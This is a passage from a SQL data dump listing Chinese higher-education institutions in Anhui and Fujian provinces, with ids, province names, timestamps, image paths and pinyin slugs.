17:40:35','/images/school/default.png','fuyangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(987,'安庆师范大学','安徽省','2014-04-23 00:00:00','2017-09-04 17:18:22','/images/school/default.png','anqingshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(988,'黄山学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huangshanxueyuan',0,NULL,NULL,0,NULL,NULL),(989,'皖西学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wanxixueyuan',0,NULL,NULL,0,NULL,NULL),(990,'滁州学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','chuzhouxueyuan',0,NULL,NULL,0,NULL,NULL),(991,'宿州学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhouxueyuan',0,NULL,NULL,0,NULL,NULL),(992,'巢湖学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','chaohuxueyuan',0,NULL,NULL,0,NULL,NULL),(993,'淮南师范学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huainanshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(994,'铜陵学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','tonglingxueyuan',0,NULL,NULL,0,NULL,NULL),(995,'安徽科技学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuikejixueyuan',0,NULL,NULL,0,NULL,NULL),(996,'安徽三联学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuisanlianxueyuan',0,NULL,NULL,0,NULL,NULL),(997,'合肥学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hefeixueyuan',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(998,'蚌埠学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','bangbuxueyuan',0,NULL,NULL,0,NULL,NULL),(999,'池州学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','chizhouxueyuan',0,NULL,NULL,0,NULL,NULL),(1000,'安徽文达信息工程学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','anhuiwendaxinxigongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1001,'安徽外国语学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiwaiguoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(1002,'合肥师范学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hefeishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1003,'安徽新华学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuixinhuaxueyuan',0,NULL,NULL,0,NULL,NULL),(1004,'安庆医药高等专科学校','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anqingyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1005,'桐城师范高等专科学校','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','tongchengshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1006,'合肥幼儿师范高等专科学校','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hefeiyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1007,'安徽中医药高等专科学校','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuizhongyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1008,'安徽医学高等专科学校','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1009,'亳州学院','安徽省','2014-04-23 00:00:00','2017-09-04 17:19:12','/images/school/default.png','bozhoushifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1010,'马鞍山师范高等专科学校','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','maanshanshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1011,'安徽职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1012,'淮北职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','huaibeizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1013,'芜湖职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','wuhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1014,'淮南联合大学','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','huainanlianhedaxue',0,NULL,NULL,0,NULL,NULL),(1015,'合肥职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hefeizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1016,'民办合肥滨湖职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minbanhefeibinhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1017,'民办合肥财经职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minbanhefeicaijingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1018,'安徽涉外经济职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuishewaijingjizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1019,'安徽绿海商务职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuilvhaishangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1020,'合肥共达职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hefeigongdazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1021,'蚌埠经济技术职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','bangbujingjijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1022,'民办安徽旅游职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minbananhuilvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1023,'徽商职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','huishangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1024,'马鞍山职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','maanshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1025,'安徽现代信息工程职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuixiandaixinxigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1026,'安徽矿业职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuikuangyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1027,'合肥信息技术职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hefeixinxijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1028,'黄山职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','huangshanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1029,'滁州城市职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','chuzhouchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1030,'安徽汽车职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiqichezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1031,'皖西卫生职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','wanxiweishengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1032,'安徽长江职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuichangjiangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1033,'安徽扬子职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiyangzizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1034,'安徽黄梅戏艺术职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuihuangmeixiyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1035,'安徽粮食工程职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiliangshigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1036,'安徽人口职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuirenkouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1037,'合肥科技职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hefeikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1038,'安徽商贸职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuishangmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1039,'安徽水利水电职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuishuilishuidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1040,'阜阳职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1041,'铜陵职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','tonglingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1042,'民办万博科技职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minbanwanbokejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1043,'安徽警官职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuijingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1044,'淮南职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','huainanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1045,'安徽工业经济职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuigongyejingjizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1046,'合肥通用职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','hefeitongyongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1047,'安徽工贸职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuigongmaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1048,'宿州职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','suzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1049,'六安职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','liuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1050,'安徽电子信息职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuidianzixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1051,'民办合肥经济技术职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minbanhefeijingjijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1052,'安徽交通职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1053,'安徽体育运动职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuitiyuyundongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1054,'滁州职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','chuzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1055,'池州职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','chizhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1056,'宣城职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','xuanchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1057,'安徽广播影视职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiguangboyingshizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1058,'安徽电气工程职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuidianqigongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1059,'安徽冶金科技职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiyejinkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1060,'安徽城市管理职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuichengshiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1061,'安徽机电职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuijidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1062,'安徽工商职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuigongshangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1063,'安徽中澳科技职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuizhongaokejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1064,'阜阳科技职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuyangkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1065,'亳州职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','bozhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1066,'安徽国防科技职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiguofangkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1067,'安庆职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anqingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1068,'安徽艺术职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1069,'安徽财贸职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuicaimaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1070,'安徽国际商务职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiguojishangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1071,'安徽公安职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuigonganzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1072,'安徽林业职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuilinyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1073,'安徽审计职业学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuishenjizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1074,'安徽新闻出版职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuixinwenchubanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1075,'安徽邮电职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuiyoudianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1076,'安徽工业职业技术学院','安徽省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','anhuigongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1077,'厦门大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamendaxue',0,NULL,NULL,0,NULL,NULL),(1078,'华侨大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','huaqiaodaxue',0,NULL,NULL,0,NULL,NULL),(1079,'福州大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhoudaxue',0,NULL,NULL,0,NULL,NULL),(1080,'福建农林大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujiannonglindaxue',0,NULL,NULL,0,NULL,NULL),(1081,'集美大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jimeidaxue',0,NULL,NULL,0,NULL,NULL),(1082,'福建医科大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianyikedaxue',0,NULL,NULL,0,NULL,NULL),(1083,'福建中医药大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(1084,'福建师范大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianshifandaxue',0,NULL,NULL,0,NULL,NULL),(1085,'闽南师范大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minnanshifandaxue',0,NULL,NULL,0,NULL,NULL),(1086,'仰恩大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','yangendaxue',0,NULL,NULL,0,NULL,NULL),(1087,'福建工程学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujiangongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1088,'闽江学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minjiangxueyuan',0,NULL,NULL,0,NULL,NULL),(1089,'武夷学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','wuyixueyuan',0,NULL,NULL,0,NULL,NULL),(1090,'宁德师范学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','ningdeshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1091,'泉州师范学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','quanzhoushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1092,'厦门理工学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamenligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1093,'三明学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','sanmingxueyuan',0,NULL,NULL,0,NULL,NULL),(1094,'龙岩学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','longyanxueyuan',0,NULL,NULL,0,NULL,NULL),(1095,'福建警察学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(1096,'莆田学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','futianxueyuan',0,NULL,NULL,0,NULL,NULL),(1097,'闽南理工学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minnanligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1098,'福州外语外贸学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhouwaiyuwaimaoxueyuan',0,NULL,NULL,0,NULL,NULL),(1099,'福建江夏学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/1099.png','fujianjiangxiaxueyuan',0,NULL,NULL,0,NULL,NULL),(1100,'福建商业高等专科学校','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianshangyegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1101,'福建幼儿师范高等专科学校','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1102,'泉州幼儿师范高等专科学校','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','quanzhouyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1103,'闽江师范高等专科学校','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minjiangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1104,'厦门医学院','福建省','2014-04-23 00:00:00','2017-09-04 17:19:40','/images/school/default.png','shamenyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1105,'泉州医学高等专科学校','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','quanzhouyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1106,'福建船政交通职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianchuanzhengjiaotongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1107,'漳州职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zhangzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1108,'黎明职业大学','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','limingzhiyedaxue',0,NULL,NULL,0,NULL,NULL),(1109,'福建华南女子职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianhuanannvzizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1110,'福建卫生职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianweishengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1111,'福建生物工程职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianshengwugongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1112,'福建艺术职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1113,'厦门城市职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamenchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1114,'德化陶瓷职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','dehuataocizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1115,'宁德职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','ningdezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1116,'厦门软件职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamenruanjianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1117,'福建体育职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujiantiyuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1118,'漳州城市职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zhangzhouchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1119,'厦门南洋职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamennanyangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1120,'厦门东海职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamendonghaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1121,'漳州科技职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zhangzhoukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1122,'漳州理工职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zhangzhouligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1123,'武夷山职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','wuyishanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1124,'漳州卫生职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zhangzhouweishengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1125,'泉州泰山航海职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','quanzhoutaishanhanghaizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1126,'泉州轻工职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','quanzhouqinggongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1127,'厦门安防科技职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamenanfangkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1128,'闽西职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1129,'福州职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1130,'福建林业职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianlinyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1131,'福建信息职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1132,'福建水利电力职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianshuilidianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1133,'福建电力职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujiandianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1134,'厦门海洋职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamenhaiyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1135,'福建农业职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujiannongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1136,'福州英华职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhouyinghuazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1137,'厦门华厦学院','福建省','2014-04-23 00:00:00','2017-09-04 17:20:09','/images/school/default.png','shamenhuashazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1138,'泉州纺织服装职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','quanzhoufangzhifuzhuangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1139,'泉州华光职业学院','福建省','2014-04-23 00:00:00','2017-09-04 17:21:10','/images/school/default.png','quanzhouhuaguangsheyingyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1140,'泉州理工职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','quanzhouligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1141,'福建警官职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fujianjingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1142,'闽北职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','minbeizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1143,'福州黎明职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhoulimingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1144,'泉州信息工程学院','福建省','2014-04-23 00:00:00','2017-09-04 17:20:39','/images/school/default.png','quanzhouxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1145,'厦门演艺职业学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamenyanyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1146,'厦门华天涉外职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shamenhuatianshewaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1147,'福州科技职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','fuzhoukejizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1148,'泉州经贸职业技术学院','福建省','2014-04-23 00:00:00','2015-10-16 